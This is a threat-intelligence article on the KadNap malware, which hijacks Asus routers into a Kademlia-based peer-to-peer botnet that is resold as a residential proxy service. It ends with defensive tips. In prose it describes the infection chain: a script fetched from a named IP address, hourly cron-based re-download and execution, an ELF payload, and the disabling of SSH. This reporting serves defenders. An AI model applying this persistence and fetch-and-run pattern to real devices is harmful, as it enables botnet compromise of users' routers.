KadNap Malware

Cybersecurity researchers have identified a newly emerging malware strain known as KadNap, which primarily targets Asus routers and recruits them into a botnet designed to proxy malicious internet traffic. First observed in the wild in August 2025, the malware has already infected more than 14,000 devices worldwide. Analysis indicates that over 60% of compromised systems are located in the United States, while smaller clusters of infections have been detected in Taiwan, Hong Kong, Russia, the United Kingdom, Australia, Brazil, France, Italy, and Spain.

Although Asus routers appear to be the primary targets, investigations show that the operators behind KadNap have expanded their efforts to include a broader range of edge networking devices. This expansion suggests a deliberate attempt to maximize the size and resilience of the botnet infrastructure.

Peer-to-Peer Concealment Through Kademlia Technology

A defining feature of the KadNap operation is its reliance on a modified implementation of the Kademlia Distributed Hash Table (DHT) protocol. This protocol is integrated into a peer-to-peer architecture that conceals the location of the botnet's infrastructure by hiding command systems within distributed nodes.

Compromised devices communicate through the DHT network to discover and connect to Command-and-Control (C2) servers. By dispersing communication across a decentralized environment, the malware avoids reliance on a single infrastructure point, significantly complicating traditional detection and takedown efforts. The approach effectively blends malicious traffic into legitimate peer-to-peer network activity, making monitoring and disruption considerably more difficult for defenders.

Infection Mechanism and Persistence Strategy

The infection chain begins with a shell script named aic.sh, which is downloaded from a command server hosted at the IP address 212.104.141.140. This script initiates the process of integrating the compromised device into the botnet's peer-to-peer ecosystem.

The script establishes persistence by creating a scheduled cron job that retrieves the same script at the 55-minute mark of every hour. Each time it is downloaded, the script is renamed to '.asusrouter' and executed. Once persistence is secured, the script downloads a malicious ELF binary, renames it kad, and runs it, effectively deploying the KadNap malware payload. The malware has been engineered to operate on devices using both ARM and MIPS processors, enabling it to compromise a wide range of router architectures.

Time-Based Peer Discovery and Network Coordination

KadNap incorporates a mechanism for synchronizing activity across its decentralized network. The malware connects to a Network Time Protocol (NTP) server to retrieve the current system time and combines it with the infected device's uptime information. These values are used to generate a hash that helps the infected device locate peers within the distributed network.

This process enables compromised systems to discover other nodes, obtain instructions, and download additional malicious files without relying on a centralized command structure. Supporting scripts such as fwr.sh and /tmp/.sose also perform additional tasks, including disabling port 22, the standard TCP port used by Secure Shell (SSH), and extracting lists of C2 server address and port combinations used for further communication.

Commercialization of the Botnet Through Proxy Services

Once routers are compromised, they are integrated into a commercial proxy network marketed under the name Doppelgänger through the website doppelganger.shop. Security researchers assess this service to be a rebranded version of Faceless, a proxy platform previously associated with the TheMoon malware.

According to promotional material published by the service, the network provides residential proxy access across more than 50 countries and advertises '100% anonymity' for users. Evidence suggests the platform was launched around May or June 2025. The infrastructure segments infected devices by type and model, as not every compromised device communicates with every command server. This segmentation indicates a structured and scalable botnet management strategy.

The proxy network has already been observed being exploited by multiple threat actors. However, attribution remains difficult because routers involved in the network are sometimes simultaneously infected with additional malware families, obscuring which actor is responsible for specific malicious activities.

Defensive Measures for Router Owners

The rise of KadNap highlights the growing risk posed by poorly secured edge devices within both home and small-office environments. Network defenders and individual users can significantly reduce exposure by adopting several security practices:

• Maintain routers and networking devices with the latest firmware and security updates.
• Reboot devices periodically to clear temporary malicious processes when applicable.
• Replace default credentials with strong, unique passwords.
• Restrict and secure administrative management interfaces.
• Retire and replace routers that have reached end-of-life and no longer receive vendor security updates.

A Decentralized Botnet Designed for Stealth

KadNap distinguishes itself from many traditional botnets that support anonymous proxy services through its use of a decentralized peer-to-peer architecture. By leveraging the Kademlia DHT protocol, the botnet distributes control across infected devices rather than relying on easily identifiable centralized servers.

This architecture provides operators with resilient communication channels that are significantly harder to detect, block, or dismantle. The strategic goal is clear: maintain operational continuity, evade security monitoring, and complicate defensive response efforts for cybersecurity teams.